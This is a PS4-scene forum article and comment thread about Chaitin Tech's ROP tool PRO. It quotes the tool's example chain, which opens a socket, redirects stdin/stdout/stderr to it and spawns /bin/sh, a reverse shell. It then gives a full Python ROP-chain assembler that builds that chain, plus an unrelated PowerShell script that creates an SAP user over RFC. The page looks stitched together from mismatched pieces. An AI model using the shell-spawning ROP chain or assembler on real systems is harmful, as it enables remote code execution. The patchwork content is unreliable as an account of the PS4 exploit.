Category: PS4 Jailbreaking | Thread starter: PSXHAX | Start date: Oct 27, 2016 at 11:35 PM
Following recent research by PlayStation 4 developers into the 4.01 PS4 jailbreak by Chaitin Tech, today the Chinese PS4 jailbreaking team have released a ROP (Return Oriented Programming) tool, PRO, on their Git repository to aid developers in exploiting the PlayStation 4.

Download: pro-master.zip / GIT

PSXHAX Moderator @Centrino points out the Git work is incomplete, referencing line 41, meaning it only contains partial information and nothing can be done with it by end users just yet.

In other words, although Chaitin Tech are not teasing, they also are not spoon-feeding (giving away their full exploit).

Here is a snippet from #ps4dev on IRC via @Fimo for those interested:

[rck`d] the nonsecure browser has no jit, only the secure browser now (used for PSN store, etc) has JIT
[rck`d] Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged process

:sneaky: Everyone can draw their own conclusions, but thus far it wouldn't surprise me if the Chinese Team is just a 'smoke and mirrors' scheme as dongle douchebags start re-DRMing the exploit to profit off PS4 sceners... then when people whine they'll direct them to this Git of incomplete code as a 'free' alternative to their useless 'product', but hopefully I'm mistaken. :whistle:

Anyhow, to quote from the README.md: PRO: PROgramming ROP like a PRO

This is a crappy tool used in our private PS4 jailbreak. Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged processes. We have to write the kernel exploitation in ROP, like what has been done in the HENKaku jailbreak.

Build
Code:
pip install git+https://github.com/chaitin/pro
If you have modified the pro.g4 file, use the following commands to generate new lexer and parser.
Code:
cd pro/parse && antlr4 -no-listener -visitor -Dlanguage=Python2 pro.g4
Examples
Code:
toy {
    {% include "gadgets.pro" %}
    {% include "glibc.pro" %}
    const AF_INET(2);
    const SOCK_STREAM(1);
    const IPPROTO_IP(0);
    var fd;
    socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    func store_rdx_rax<libc, 0x0002e60c, "rdx,rax::">;
    store_rdx_rax(&fd, undefined);
    printf("socket fd = %d\n", fd);
    array addr["\x02\x00\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"];
    connect(fd, addr, 0x10);
    {% for i in range(3): %}
        dup2(fd, {{i}});
    {% endfor %}
    system("/bin/sh");
    exit(1);
}
Usage

A BIG TODO. Just try and learn by yourself.

Quick Guide

All expressions are evaluated at compile time; a Const or Func must be initialized in its declaration.

A Func is initialized with <Base, Offset, Signature>, as in `func store_rdx_rax<libc, 0x0002e60c, "rdx,rax::">;` above. Base/Offset are used for relocation, and the Signature determines the calling convention of the Func.

An Array can be declared with a size (Int) or directly initialized with its content (String).

For loops are written in the template script and rendered before compilation. For more information, check Jinja2.
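To make the Quick Guide and the toy example above concrete, here is a small x86-64 ROP-chain assembler written for this article; it is not code from the chaitin/pro repository and it does not reproduce PRO's grammar. It mirrors PRO's building blocks (a func declared as base/offset/signature, consts, a var slot filled at run time through a store gadget, arrays placed in a data area, and calls that become pop-register gadgets followed by the target address) and then assembles the README's socket/connect/dup2/system chain with them. Everything about the environment is assumed: the libc base, the data-area address, every gadget offset (including a "mov rdi, [rdx]; ret" load gadget, which PRO's README does not mention), the libc function offsets, and a simplified signature format of comma-separated argument registers without PRO's trailing "::" part. The Jinja2 rendering step is replaced by a plain Python loop.

```python
import struct

QWORD = 8
UNDEFINED = object()  # marker for "do not load this register" (PRO's `undefined`)

# Assumed environment: none of these values come from the page or from PRO.
LIBC_BASE = 0x7FFFF7A0D000  # assumption: leaked libc load address
DATA_BASE = 0x7FFFFFFFE000  # assumption: attacker-controlled buffer at a known address
GADGETS = {                 # assumption: gadget offsets relative to LIBC_BASE
    "pop rdi; ret":        0x021102,
    "pop rsi; ret":        0x022E51,
    "pop rdx; ret":        0x001B96,
    "mov [rdx], rax; ret": 0x02E60C,  # the offset the README's store_rdx_rax uses
    "mov rdi, [rdx]; ret": 0x02E620,  # assumption: load gadget for run-time values
}

class Func:
    """func name<Base, Offset, Signature>: address = Base + Offset; the signature
    lists the registers that receive the arguments, in order (simplified form)."""
    def __init__(self, base, offset, signature):
        self.base, self.offset = base, offset
        self.regs = [r.strip() for r in signature.split(",") if r.strip()]

class Var:
    """A qword slot in the data area whose value exists only at run time."""
    def __init__(self, addr):
        self.addr = addr

class Chain:
    def __init__(self, bases, gadgets, data_base):
        self.bases, self.gadgets, self.data_base = bases, gadgets, data_base
        self.chain = []          # qwords in stack order
        self.data = bytearray()  # arrays and vars, laid out from data_base upward

    def gadget(self, name):
        return self.bases["libc"] + self.gadgets[name]

    def array(self, content):
        """array name[...]: reserve `content` zero bytes (int) or copy the bytes
        given, and return the run-time address of the slot."""
        addr = self.data_base + len(self.data)
        self.data += (b"\0" * content) if isinstance(content, int) else bytes(content)
        self.data += b"\0" * (-len(self.data) % QWORD)  # keep slots qword-aligned
        return addr

    def var(self):
        return Var(self.array(QWORD))

    def call(self, func, *args):
        """Load each argument register, then 'return' into the target address."""
        if len(args) != len(func.regs):
            raise ValueError("signature takes %d args, got %d" % (len(func.regs), len(args)))
        pairs = list(zip(func.regs, args))
        # Run-time values are loaded through rdx, which would clobber an immediate
        # rdx argument loaded earlier, so all Var loads are emitted first.
        for reg, val in pairs:
            if isinstance(val, Var):
                self.chain += [self.gadget("pop rdx; ret"), val.addr,
                               self.gadget("mov %s, [rdx]; ret" % reg)]
        for reg, val in pairs:
            if isinstance(val, Var) or val is UNDEFINED:
                continue  # UNDEFINED: keep whatever the previous call left in the register
            self.chain += [self.gadget("pop %s; ret" % reg), val]
        self.chain.append(self.bases[func.base] + func.offset)

    def build(self):
        """Serialize the chain as little-endian qwords."""
        return b"".join(struct.pack("<Q", q & 0xFFFFFFFFFFFFFFFF) for q in self.chain)

    def listing(self):
        """Readable dump: one address per line, annotated with the gadget name if known."""
        names = {self.gadget(n): n for n in self.gadgets}
        return ["%016x  %s" % (q, names.get(q, "")) for q in self.chain]

# The README's "toy" chain written against this assembler. The libc function
# offsets are assumptions; on a real target they come from the leaked libc.
AF_INET, SOCK_STREAM, IPPROTO_IP = 2, 1, 0
socket_  = Func("libc", 0x0F7760, "rdi,rsi,rdx")
connect_ = Func("libc", 0x0F7630, "rdi,rsi,rdx")
dup2_    = Func("libc", 0x0E8BB0, "rdi,rsi")
system_  = Func("libc", 0x045390, "rdi")
exit_    = Func("libc", 0x03A030, "rdi")
store_rdx_rax = Func("libc", GADGETS["mov [rdx], rax; ret"], "rdx,rax")

def build_toy():
    c = Chain({"libc": LIBC_BASE}, GADGETS, DATA_BASE)
    fd = c.var()                                        # var fd;
    addr = c.array(b"\x02\x00\x41\x41" + b"\x00" * 12)  # sockaddr_in: AF_INET, port 0x4141, 0.0.0.0
    sh = c.array(b"/bin/sh\0")
    c.call(socket_, AF_INET, SOCK_STREAM, IPPROTO_IP)   # socket() leaves the fd in rax
    c.call(store_rdx_rax, fd.addr, UNDEFINED)           # [&fd] = rax; rax is deliberately not reloaded
    c.call(connect_, fd, addr, 0x10)                    # fd is a run-time value, addr a compile-time address
    for i in range(3):                                  # PRO renders this loop with a Jinja2 {% for %}
        c.call(dup2_, fd, i)
    c.call(system_, sh)
    c.call(exit_, 1)
    return c

if __name__ == "__main__":
    toy = build_toy()
    print("\n".join(toy.listing()))
    print("%d qwords, %d bytes of data" % (len(toy.chain), len(toy.data)))
```

Two caveats that also apply to the real tool: a value stored in a var is only usable later if there is a load gadget into the needed register (here only rdi has one, so passing a Var as an rdx argument would fail), and argument order matters because the load sequence clobbers rdx; that is why the compile-time/run-time distinction in the Quick Guide is not a cosmetic one.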

The following was posted on Pastebin.com as possibly being part of the Chaitin PS4 exploit. It is nothing of the kind: it is a PowerShell script that loads the SAP NetWeaver .NET Connector (NCo) assemblies and calls BAPI_USER_CREATE1 over RFC to create an SAP user, so it tells us nothing about the PS4 exploit:
Code:
# Returns the directory the script is running from.
# Which property is available depends on the PowerShell version.
function Get-ScriptDir() {
    if ($PSVersionTable.PSVersion.Major -ge 3) {
        # PowerShell 3+: $PSScriptRoot is populated automatically
        $ScriptDir = $PSScriptRoot
    }
    else {
        # PowerShell 2: derive it from the script's own invocation. The $script:
        # scope is needed because inside a function $MyInvocation describes the function.
        $ScriptDir = Split-Path $script:MyInvocation.MyCommand.Path -Parent
    }
    return $ScriptDir
}


# Loads the SAP NetWeaver .NET Connector (NCo) assemblies matching the process bitness.
function Load-Nco {
    $ScriptDir = Get-ScriptDir

    $Size = [System.IntPtr]::Size
    if ($Size -eq 4) {
        $Path = $ScriptDir + "\x86\"
    }
    elseif ($Size -eq 8) {
        $Path = $ScriptDir + "\x64\"
    }

    [Reflection.Assembly]::LoadFile($Path + "sapnco.dll") > $Null
    [Reflection.Assembly]::LoadFile($Path + "sapnco_utils.dll") > $Null
}

# -----
# Builds the RFC destination (connection parameters) for the SAP system
# -----
Function Get-Destination {
    $cfgParams = New-Object SAP.Middleware.Connector.RfcConfigParameters
    $cfgParams.Add("NAME", "TEST")
    $cfgParams.Add("ASHOST", "ABAP")
    $cfgParams.Add("SYSNR", "00")
    $cfgParams.Add("CLIENT", "400")
    $cfgParams.Add("USER", "User")

    # Prompt for the password without echo. NCo needs it as plain text, so the
    # SecureString is unwrapped and the unmanaged copy is zeroed right after use.
    $secPasswd = Read-Host -Prompt "Password" -AsSecureString
    $ptrPasswd = [Runtime.InteropServices.Marshal]::SecureStringToBSTR($secPasswd)
    Try {
        $passwd = [Runtime.InteropServices.Marshal]::PtrToStringBSTR($ptrPasswd)
    }
    Finally {
        [Runtime.InteropServices.Marshal]::ZeroFreeBSTR($ptrPasswd)
    }
    $cfgParams.Add("PASSWD", $passwd)

    Return [SAP.Middleware.Connector.RfcDestinationManager]::GetDestination($cfgParams)
}

# ----
# Calls an SAP function module (BAPI) over RFC
# ----
Function Invoke-SAPFunctionModule {
    $destination = Get-Destination

    # Metadata: look the function modules up in the destination's repository
    Try {
        [SAP.Middleware.Connector.IRfcFunction]$bapiCreateUser = $destination.Repository.CreateFunction("BAPI_USER_CREATE1")
        [SAP.Middleware.Connector.IRfcFunction]$bapiTransactionCommit = $destination.Repository.CreateFunction("BAPI_TRANSACTION_COMMIT")
    }
    Catch [SAP.Middleware.Connector.RfcBaseException] {
        Write-Host "Failed: $($_.Exception.Message)"
        Break
    }

    # Set import parameters
    $bapiCreateUser.SetValue("USERNAME", "MYUSER")
    [SAP.Middleware.Connector.IRfcStructure]$imPassword = $bapiCreateUser.GetStructure("PASSWORD")
    $imPassword.SetValue("BAPIPWD", "initial")
    [SAP.Middleware.Connector.IRfcStructure]$imAddress = $bapiCreateUser.GetStructure("ADDRESS")
    $imAddress.SetValue("FIRSTNAME", "My")
    $imAddress.SetValue("LASTNAME", "User")
    $imAddress.SetValue("FULLNAME", "MyUser")

    # Open a stateful context so the create and the commit run in the same session
    [SAP.Middleware.Connector.RfcSessionManager]::BeginContext($destination) > $Null

    # Function module calls
    Try {
        # Create the user
        $bapiCreateUser.Invoke($destination)
        [SAP.Middleware.Connector.IRfcTable]$return = $bapiCreateUser.GetTable("RETURN")
        ForEach ($line in $return) {
            Write-Host $line.GetValue("TYPE") "-" $line.GetValue("MESSAGE")
        }
        # Commit
        $bapiTransactionCommit.Invoke($destination)
    }
    Finally {
        # Close the context
        [SAP.Middleware.Connector.RfcSessionManager]::EndContext($destination) > $Null
    }
}


# ----
# Main function
# ----
Function Main() {
    Load-Nco
    Invoke-SAPFunctionModule
}


# ------------------------------
# Main
# ------------------------------

Main
Thanks to @spyro2670 in the Shoutbox and @simobuoncuo for the tip!
[Image: Chaitin Tech PS4 Jailbreak ROP Tool]

Comments

PSXHAX (Staff Member, Moderator)

But didn't other devs say they've got the exploit a few months back?
Rebug's @evilsperm said this a few days back, which hints at it:

Scene groups like TRSi also made vague hints on PS4 game decryption in their NFOs but nothing specific about having an exploit themselves.

Unless all they care about is quick cash... if the 'Chinese Team' really exists and this isn't just a charade by dongle makers, they would be foolish to settle for dongle money when they could start their own online crowdfunding / Kickstarter page and let everyone globally contribute, but we'll see what direction it goes in next. ;)

mcmrc1 (Senior Member)

I don't think they are dongle makers... They have also added support for 3.55 and 4.01 Linux on the fail0verflow Git. But same as @failoverflow, without a ksploit.

But if one gets released you can use it directly to load Linux :)

PLAYER 1 (Senior Member)

Remember the dongles/ODEs: after a while some Chinese manufacturers made them based on an old discovery that nobody had used before because of the money required to build the software and/or hardware to make it real and useful.

So, if the PS4 backdoor is software based, the Chinese are not interested, but if it involves a dongle/chip/flasher/dildo... they can design it, build it and sell it in a minute. Money rules, boys; if some hardware is needed, it costs money and they will sell it well, what do you expect??

We can just pray we can at least pay for it, or wait for the devs to make a big move. Nothing is free these days; everyone involved (devs or factories) is wasting time and money to do whatever they can.

Too many unclear things around this "PS4 scene", I don't like it.

mcmrc1 (Senior Member)

@PLAYER 1 Also I think if some dongle pops up our devs will instantly pwn the device and give it to us for free :)
Most of them also hate reDRM devices :)

There is also good hardware like the E3 flasher, but they also make it look bad because with their FW you can only use it on one PS3 ^^ Idiots...